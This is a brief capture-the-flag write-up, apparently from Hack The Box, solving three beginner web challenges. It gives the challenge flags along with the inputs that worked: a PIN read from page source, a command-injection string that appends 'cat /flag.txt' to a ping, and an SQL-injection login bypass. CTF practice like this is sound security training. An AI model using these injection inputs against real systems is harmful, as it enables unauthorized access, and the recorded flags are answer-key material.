View page source -> correctPin: "8291"
HTB{V13w_50urc3_c4n_b3_u53ful!!!}
Simple command injection - enter /ping 1 & cat /flag.txt
and get the flag
HTB{4lw4y5_54n1t1z3_u53r_1nput!!!}
Since my Web knowledge is very limited read about SQL Injection
and then entered these credentials on the login screen:
admin
" or ""="
HTB{p4r4m3t3r1z4t10n_1s_1mp0rt4nt!!!}